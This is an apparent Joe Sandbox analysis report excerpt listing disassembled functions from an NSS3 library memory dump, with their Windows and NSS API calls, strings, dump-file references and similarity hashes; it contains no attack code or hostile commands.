Part of subcall function 6C8A9090: TlsGetValue.KERNEL32 ref: 6C8A9116
Part of subcall function 6C8A9090: LeaveCriticalSection.KERNEL32 ref: 6C8A913F

PR_EnterMonitor.NSS3(6C7F80DD), ref: 6C7EE549

Part of subcall function 6C8A9090: LeaveCriticalSection.KERNEL32 ref: 6C8A91AA
Part of subcall function 6C8A9090: TlsGetValue.KERNEL32 ref: 6C8A9212
Part of subcall function 6C8A9090: _PR_MD_WAIT_CV.NSS3 ref: 6C8A926B

PR_ExitMonitor.NSS3 ref: 6C7EE56D
PL_HashTableDestroy.NSS3 ref: 6C7EE57B

Part of subcall function 6C7EE190: PR_EnterMonitor.NSS3(?,?,6C7EE175), ref: 6C7EE19C
Part of subcall function 6C7EE190: PR_EnterMonitor.NSS3(6C7EE175), ref: 6C7EE1AA
Part of subcall function 6C7EE190: PR_ExitMonitor.NSS3 ref: 6C7EE208
Part of subcall function 6C7EE190: PL_HashTableRemove.NSS3(?), ref: 6C7EE219
Part of subcall function 6C7EE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7EE231
Part of subcall function 6C7EE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7EE249
Part of subcall function 6C7EE190: PR_ExitMonitor.NSS3 ref: 6C7EE257

PR_ExitMonitor.NSS3(6C7F80DD), ref: 6C7EE5B5
PR_DestroyMonitor.NSS3 ref: 6C7EE5C3

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
String ID:
API String ID: 3740585915-0
Opcode ID: 4c60542c9e6f611e7a1dcb309dc2b7780ffa684cc6378bcf723f72f01e1e1105
Instruction ID: 7ee884c89d6f3c68d12d0ba961a1959cf6ebfb128cfe6b2881c08a31e625ce27
Opcode Fuzzy Hash: 4c60542c9e6f611e7a1dcb309dc2b7780ffa684cc6378bcf723f72f01e1e1105
Instruction Fuzzy Hash: 910156B2E18184CBEF017FAADE066553BB5F72624CF20B436D80582611FB32D569DB82

Uniqueness

Uniqueness Score: -1.00%

Function 6C7CAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7CAFDA

Strings

%s at line %d of [%.10s], xrefs: 6C7CAFD3
misuse, xrefs: 6C7CAFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7CAFC4
unable to delete/modify collation sequence due to active statements, xrefs: 6C7CAF5C

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: ed106dc28ea83d84a78b61e7cfeec7f31d76b4cabd96a4174244dc162eaba8f6
Instruction ID: f91964e432f381f10040e5076600748442aa60215043aa31e5b5a8dc40147876
Opcode Fuzzy Hash: ed106dc28ea83d84a78b61e7cfeec7f31d76b4cabd96a4174244dc162eaba8f6
Instruction Fuzzy Hash: 5D912671B042168FDB04CF29C994BAEB7F1BF45325F1985A8E864AB791C330EC01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C76E6D0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 194COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C76E81D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010966,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C76DB91,?,?), ref: 6C76E8E7

Strings

%s at line %d of [%.10s], xrefs: 6C76E8E0
database corruption, xrefs: 6C76E8DB
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C76E8C5, 6C76E8D1, 6C76E8F9, 6C76E905, 6C76E911, 6C76E91D, 6C76E929, 6C76E935

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 3107271255-598938438
Opcode ID: 7be749f258cc1d8b4bf285cec43c6eea6891d083c70e762c79b474aba4681f7f
Instruction ID: 1ddfb8f68d59c2bb1e5dd3f9850968ff865479c76b9979c3c069fb36f2ac320b
Opcode Fuzzy Hash: 7be749f258cc1d8b4bf285cec43c6eea6891d083c70e762c79b474aba4681f7f
Instruction Fuzzy Hash: B771CF70D0421A9FCB14CF9EC9909EEBBB0AB19314B14456AE884B7F42D374E944CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6C76E4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C76E53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C76E5BC

Strings

%s at line %d of [%.10s], xrefs: 6C76E534, 6C76E5B6
database corruption, xrefs: 6C76E52F, 6C76E5B1
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C76E525, 6C76E596, 6C76E5A7

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: cb89a19a384bd19b95f56cfc8aa4744746e13972c060884e3df131fa92b6bf40
Instruction ID: 6a0edac840da64fe6d43e09d819302961a17cdab57af441f2be515e1ad2c6882
Opcode Fuzzy Hash: cb89a19a384bd19b95f56cfc8aa4744746e13972c060884e3df131fa92b6bf40
Instruction Fuzzy Hash: 253167306407189BD311CEAECD9196BB7A1EB85314B54097DEC88A7F56F364E949C3F0

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E6420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C7E5DEF,?,?,?), ref: 6C7E6456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C7E5DEF,?,?,?), ref: 6C7E6476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C7E5DEF,?,?,?), ref: 6C7E64A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C7E5DEF,?,?,?), ref: 6C7E64C2

Strings

]~l, xrefs: 6C7E6489

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID: ]~l
API String ID: 3886907618-3129197982
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: d43a17e86f09eceb8d718f1d2c2a46a47f6c2c4de94c9dde748aee32a752aa41
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: 9A212BB3A003056BEB205E68DD09B6376E8AB49318F144938F629C6B41E7B1D744C391

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C7D0BDE), ref: 6C7D0DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C7D0BDE), ref: 6C7D0DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C7D0BDE), ref: 6C7D0DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C7D0BDE), ref: 6C7D0E32

Strings

%s incr => %d (find lib), xrefs: 6C7D0E2D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 738c3d55e448785fe5e5bbe20b1fc887f1708b9dd662d3b22026ddb8fc301ce2
Instruction ID: dd77fb8b08b118b6dc031870ef556f0fd384a68dea2712dd2e37ae98e4e4f7be
Opcode Fuzzy Hash: 738c3d55e448785fe5e5bbe20b1fc887f1708b9dd662d3b22026ddb8fc301ce2
Instruction Fuzzy Hash: 1101F1727006209FE720AE289D49E1773ACEB45A09B16487DE949D3A41E761FC1487E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C82C590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C82C5C7
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C82C603
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C82C636
PK11_FreeSymKey.NSS3(?), ref: 6C82C6D7
PK11_FreeSymKey.NSS3(?), ref: 6C82C6E1

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_$DoesMechanism$Free
String ID:
API String ID: 3860933388-0
Opcode ID: b71fd5509388f652b1c5f343268ae4a24c6611e039a52d767edaac3a925a60f4
Instruction ID: 6050360931a536623c336d0afbd00dbb9c7fee95742fac74f66ce2115eec66b0
Opcode Fuzzy Hash: b71fd5509388f652b1c5f343268ae4a24c6611e039a52d767edaac3a925a60f4
Instruction Fuzzy Hash: FD41A1B550121AAFEB219F69CD85DBB77A9EF08248B400838EC09D7711E735DC64CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C844690 Relevance: 7.6, APIs: 5, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(00000001,00000000,00000000,6C930148,?,6C7F73A4,?,00000027,00000022), ref: 6C8446D9
PORT_ZAlloc_Util.NSS3(00000001,00000022), ref: 6C84473E
free.MOZGLUE(00000000,?,00000022), ref: 6C84476C
free.MOZGLUE(00000000,?,00000022), ref: 6C84477A
PORT_Strdup_Util.NSS3(6C930148,00000000,00000000,6C930148,?,6C7F73A4,?,00000027,00000022), ref: 6C844788

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Alloc_free$Strdup_
String ID:
API String ID: 1542459429-0
Opcode ID: 66ae4bd0615e20cb463298c214008013545f2b13db0bc7c66d922f83e4a6f3cb
Instruction ID: 4e6b2f939307b4c89d12d145b7c030e37813b7968bfd2dc352efb8e414824a3f
Opcode Fuzzy Hash: 66ae4bd0615e20cb463298c214008013545f2b13db0bc7c66d922f83e4a6f3cb
Instruction Fuzzy Hash: 2F31341A60D6DC4EE7220D3C1EA13E32F9A4BC715DB1C8868D8DACBB02D613840E8691

Uniqueness

Uniqueness Score: -1.00%

Function 6C872460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,6C917379,00000002,?), ref: 6C872493
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C8724B4
PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,6C917379,00000002,?), ref: 6C8724EA
PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,6C917379,00000002,?), ref: 6C8724F5
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,6C917379,00000002,?), ref: 6C8724FE

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Error$Alloc_FreeK11_Utilfree
String ID:
API String ID: 2595244113-0
Opcode ID: 57f5f21bb8db552c8e00598c2ccddc483ca5b4042d490c43e6c2f6d573fb544b
Instruction ID: 0c88f65e1890110ad89bb9370a8781d02f80475d133257e480edbc45c0fb7b4a
Opcode Fuzzy Hash: 57f5f21bb8db552c8e00598c2ccddc483ca5b4042d490c43e6c2f6d573fb544b
Instruction Fuzzy Hash: 6431E3B1A00119DBEB308FA4DD45BBF77A4EF54308F104525FD1496A80F738D864C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C878530 Relevance: 7.6, APIs: 5, Instructions: 103COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C878549
TlsGetValue.KERNEL32 ref: 6C8785CF
TlsGetValue.KERNEL32 ref: 6C8785FE
TlsGetValue.KERNEL32 ref: 6C878629
memcpy.VCRUNTIME140 ref: 6C878655

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$IdentitiesLayermemcpy
String ID:
API String ID: 2311246771-0
Opcode ID: 4caa3cb8f486b1ddeb39d6169c3905037a7cc6872033766d9868264884750c6b
Instruction ID: ee17477453452527632deec5b34b2e807d36a45f308a80f385d22af29352ec67
Opcode Fuzzy Hash: 4caa3cb8f486b1ddeb39d6169c3905037a7cc6872033766d9868264884750c6b
Instruction Fuzzy Hash: 364152B0609605DBEB30AF78D74C66EB7B4BF45308F118A2AD85897B51F730D894CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C7DEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7DEDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C7DEE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C7DEECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7DEEEB
free.MOZGLUE(?), ref: 6C7DEEF6

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 995e631a30ba2d87510a1771c19d9ef130d3a57790a894ac68d159691699b4d5
Instruction ID: 9d73be270eb20b3eded4d4cd97f241b874340f7646c1327e6e78da4435b15d98
Opcode Fuzzy Hash: 995e631a30ba2d87510a1771c19d9ef130d3a57790a894ac68d159691699b4d5
Instruction Fuzzy Hash: C33147716046069BF7219F28CD44766BBF8FB46309F160638E85AC7A50D731F810CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FA530 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C8FA55C
PR_IntervalNow.NSS3 ref: 6C8FA573
PR_IntervalNow.NSS3 ref: 6C8FA5A5
_PR_MD_UNLOCK.NSS3(?), ref: 6C8FA603

Part of subcall function 6C8A9890: TlsGetValue.KERNEL32(?,?,?,6C8A97EB), ref: 6C8A989E

_PR_MD_UNLOCK.NSS3(?), ref: 6C8FA636

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Interval$CriticalEnterSectionValue
String ID:
API String ID: 959321092-0
Opcode ID: f4b5bdaa1ad1ceed507b937018cd4ef2fa72e8f3cdce8424782c2b33f06091ba
Instruction ID: ae6989189862fa6d1315328fc74027c18a369f30bd352de948a9e83835898682
Opcode Fuzzy Hash: f4b5bdaa1ad1ceed507b937018cd4ef2fa72e8f3cdce8424782c2b33f06091ba
Instruction Fuzzy Hash: 153161B16006058FCB21DFA9C5C069AB7F5BF483A8F158975D8258BB16E731EC86CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C8086D0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C808716
TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C808727
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C80873B
PR_Unlock.NSS3(?), ref: 6C80876F
PR_SetError.NSS3(00000000,00000000), ref: 6C808787

Part of subcall function 6C8079F0: memcpy.VCRUNTIME140(?,6C90AB28,000000FC), ref: 6C807A1E
Part of subcall function 6C8079F0: PR_SetError.NSS3(FFFFE001,00000000), ref: 6C807A48

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Error$AuthenticateCriticalEnterK11_SectionUnlockValuememcpy
String ID:
API String ID: 3710639568-0
Opcode ID: 9ddea4221fbbcee6ba7ef9068404471654900e32c637da8214eb49088926c643
Instruction ID: c2c024415f467c9dde7fc120e748334009071e9eccb0e245b5f0283eacc0bc46
Opcode Fuzzy Hash: 9ddea4221fbbcee6ba7ef9068404471654900e32c637da8214eb49088926c643
Instruction Fuzzy Hash: 8C318B76B00204ABDF20AF68DD40E9A77B9EF86319F144835ED095B701EB31E954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E44D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6C7E44FF

Part of subcall function 6C8407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7E8298,?,?,?,6C7DFCE5,?), ref: 6C8407BF
Part of subcall function 6C8407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8407E6
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C84081B
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C840825

SECOID_FindOID_Util.NSS3(?), ref: 6C7E4524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7E4537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C7E4579

Part of subcall function 6C7E41B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C7E41BE
Part of subcall function 6C7E41B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C7E41E9
Part of subcall function 6C7E41B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C7E4227
Part of subcall function 6C7E41B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C7E423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E459C

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

